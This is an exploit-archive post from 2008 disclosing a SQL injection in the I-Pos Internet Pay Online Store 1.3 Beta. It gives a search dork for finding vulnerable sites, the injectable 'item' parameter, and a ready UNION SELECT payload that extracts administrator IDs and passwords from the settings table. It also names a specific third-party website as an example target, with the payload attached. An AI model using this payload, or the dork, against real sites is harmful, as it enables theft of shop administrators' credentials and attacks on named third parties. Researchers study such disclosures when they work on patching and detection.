[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability
# Published : 2008-06-01
# Author : KnocKout
# Previous Title : meBiblio 0.4.7 (SQL/Upload/XSS) Multiple Remote Vulnerabilities
# Next Title : Joomla Component JooBB 0.5.9 Blind SQL Injection Exploit


[+] Title : I-Pos Internet Pay Online Store v1.3 Beta <= Remote SQL Injection Vulnerability

==========================================================================================

[+] Author : KnocKout
[+] Special ThanX : Dr.Kacak & Cr@zy-King and CW ALL USERS . . .
[+] Cyber-Warrior.Org

===========================================================================================

S. Name : I-Pos Internet Pay Online Store
Version : 1.3 Beta
Download : http://www.asprehberi.net/Indir.asp?IcerikID=1812&SessionID=358055325
Dork : "Powered by i-pos Storefront"

Attackz;

Http://Localsite.com/path/index.asp?item=[SQL Injection]

Example Attack: http://localsite.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
Example Site: www.keysquality.com/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings

######################################################################################################

# www.Syue.com [2008-06-01]